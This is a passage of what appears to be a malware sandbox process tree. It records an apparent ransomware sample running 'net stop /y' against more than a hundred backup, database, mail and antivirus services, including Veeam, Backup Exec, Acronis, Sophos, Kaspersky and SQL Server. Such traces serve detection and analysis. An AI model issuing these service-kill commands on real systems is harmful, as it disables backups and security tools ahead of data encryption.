    C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:2420
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:2308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:6260
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:2988
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:3016
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:2980
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:2312
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:2972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:2504
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:2964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:2564
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:2956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:2248
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:2944
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6172
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:2936
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:5112
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:2920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:7032
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:2912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:6272
- C:\Windows\system32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:2404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:7548
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:2896
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:6216
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SBSMONITORING /y
  2⤵
  PID:2600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:7396
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:2556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:7608
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:2516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:7324
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:2512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:7436
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:2508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:6332
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:2496
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:7640
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:2484
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:6340
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:2388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:6380
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:2360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:6348
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:2316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:7360
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:2460
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:6360
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:2888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:3996
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:2880
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:6300
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:2872
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:604
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:2864
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:5544
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:2856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:6232
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:2840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:7196
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:2832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:5064
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:6240
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:2816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:5108
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:2808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:7220
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:2800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:5116
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:2792
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:2724
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:2784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:6452
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:2776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:6308
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:2768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:4860
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:2760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2640
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:2752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:6284
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:2744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:1796
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4868
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:2728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6456
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:2700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:5144
- C:\Windows\system32\net.exe
  "net.exe" stop SntpService /y
  2⤵
  PID:2852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SntpService /y
    3⤵
    PID:7332
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:7864
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:3076
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:7536
- C:\Windows\system32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:3100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:7900
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:7284
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPSAMA /y
  2⤵
  PID:3084
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
    3⤵
    PID:7740
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:3124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:7576
- C:\Windows\system32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:3116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:7764
- C:\Windows\system32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3108
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:7560
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:3132
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6512
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:3140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:7568
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:3148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:7720
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:7496
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3164
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6628
- C:\Windows\system32\net.exe
  "net.exe" stop “Enterprise Client Service” /y
  2⤵
  PID:3172
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Enterprise Client Service” /y
    3⤵
    PID:6412
- C:\Windows\system32\net.exe
  "net.exe" stop “SQL Backups /y
  2⤵
  PID:3180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQL Backups /y
    3⤵
    PID:5324
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer100 /y
  2⤵
  PID:3188
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer100 /y
    3⤵
    PID:7480
- C:\Windows\system32\net.exe
  "net.exe" stop NetMsmqActivator /y
  2⤵
  PID:3196
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetMsmqActivator /y
    3⤵
    PID:7888
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeIS /y
  2⤵
  PID:3204
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeIS /y
    3⤵
    PID:6472
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos AutoUpdate Service” /y
  2⤵
  PID:3212
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:7908
- C:\Windows\system32\net.exe
  "net.exe" stop SamSs /y
  2⤵
  PID:3220
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SamSs /y
    3⤵
    PID:7672
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer /y
  2⤵
  PID:3228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer /y
    3⤵
    PID:8000
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Backup Service” /y
  2⤵
  PID:3236
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
    3⤵
    PID:6460
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer110 /y
  2⤵
  PID:3244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer110 /y
    3⤵
    PID:7960
- C:\Windows\system32\net.exe
  "net.exe" stop POP3Svc /y
  2⤵
  PID:3252
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop POP3Svc /y
    3⤵
    PID:7664
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMGMT /y
  2⤵
  PID:3260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMGMT /y
    3⤵
    PID:7808
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Clean Service” /y
  2⤵
  PID:3268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Clean Service” /y
    3⤵
    PID:7504
- C:\Windows\system32\net.exe
  "net.exe" stop SMTPSvc /y
  2⤵
  PID:3276
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:7748
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:3284
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:6452
- C:\Windows\system32\net.exe
  "net.exe" stop “SQLsafe Filter Service” /y
  2⤵
  PID:3292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
    3⤵
    PID:7968
- C:\Windows\system32\net.exe
  "net.exe" stop msftesql$PROD /y
  2⤵
  PID:3300
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msftesql$PROD /y
    3⤵
    PID:7524
- C:\Windows\system32\net.exe
  "net.exe" stop SstpSvc /y
  2⤵
  PID:3308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SstpSvc /y
    3⤵
    PID:7756
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SHAREPOINT /y
  2⤵
  PID:3316
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:7692
- C:\Windows\system32\net.exe
  "net.exe" stop sophossps /y
  2⤵
  PID:3324
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophossps /y
    3⤵
    PID:7772
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQL_2008 /y
  2⤵
  PID:3332
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
    3⤵
    PID:6420
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SOPHOS /y
  2⤵
  PID:3340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
    3⤵
    PID:7948
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SQLEXPRESS /y
  2⤵
  PID:3348
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:7728
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:3356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop svcGenericHost /y
    3⤵
    PID:7712
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:3364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:6428
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:3372
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:7936
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY$ECWDB2 /y
  2⤵
  PID:3448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:6444
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKeyServiceHelper /y
  2⤵
  PID:3440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
    3⤵
    PID:7844
- C:\Windows\system32\net.exe
  "net.exe" stop SQLTELEMETRY /y
  2⤵
  PID:3432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLTELEMETRY /y
    3⤵
    PID:6500
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:3424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:7816
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3416
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:6436
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:3408
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:7704
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:7648
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:3388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:7784
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:3380
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:6484
- C:\Windows\system32\net.exe
  "net.exe" stop WRSVC /y
  2⤵
  PID:3456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop WRSVC /y
    3⤵
    PID:5140
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3508
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5176
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeMTA /y
  2⤵
  PID:3516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeMTA /y
    3⤵
    PID:5172
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:6596
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:5308
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSERVERAGENT /y
  2⤵
  PID:3532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSERVERAGENT /y
    3⤵
    PID:6636
- C:\Windows\system32\net.exe
  "net.exe" stop TrueKey /y
  2⤵
  PID:3524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TrueKey /y
    3⤵
    PID:8156
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3556
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:8176
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6644
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:3572
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6612
- C:\Windows\system32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:3580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:2584
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:3588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:6580
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:3596
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:2748
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:3604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:6572
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPS /y
  2⤵
  PID:3668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPS /y
    3⤵
    PID:6564
- C:\Windows\system32\net.exe
  "net.exe" stop “Zoolz 2 Service” /y
  2⤵
  PID:3660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
    3⤵
    PID:5268
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$TPSAMA /y
  2⤵
  PID:3652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
    3⤵
    PID:6532
- C:\Windows\system32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:3676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:2084
- C:\Windows\system32\net.exe
  "net.exe" stop EraserSvc11710 /y
  2⤵
  PID:3644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EraserSvc11710 /y
    3⤵
    PID:2720
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:3636
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:6588
- C:\Windows\system32\net.exe
  "net.exe" stop MSExchangeES /y
  2⤵
  PID:3628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSExchangeES /y
    3⤵
    PID:5444
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:3728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:8184
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:8044
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:3720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:8092
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:3712
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:5276
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:3704
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:8108
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Agent” /y
  2⤵
  PID:3692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
    3⤵
    PID:5244
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:3744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:5528
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:3684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:6520
- C:\Windows\system32\net.exe
  "net.exe" stop IISAdmin /y
  2⤵
  PID:3620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop IISAdmin /y
    3⤵
    PID:8168
- C:\Windows\system32\net.exe
  "net.exe" stop MsDtsServer /y
  2⤵
  PID:3612
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MsDtsServer /y
    3⤵
    PID:2660
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$BKUPEXEC /y
  2⤵
  PID:3752
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
    3⤵
    PID:8076
- C:\Windows\system32\net.exe
  "net.exe" stop unistoresvc_1af40a /y
  2⤵
  PID:3760
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop unistoresvc_1af40a /y
    3⤵
    PID:6684
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Message Router” /y
  2⤵
  PID:3768
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Message Router” /y
    3⤵
    PID:8084
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:3776
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:5380
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:3784
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:8068
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDeviceMediaService /y
  2⤵
  PID:3832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
    3⤵
    PID:8028
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos System Protection Service” /y
  2⤵
  PID:3824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
    3⤵
    PID:2256
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:3816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:8060
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:3808
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5544
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Safestore Service” /y
  2⤵
  PID:3800
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
    3⤵
    PID:8036
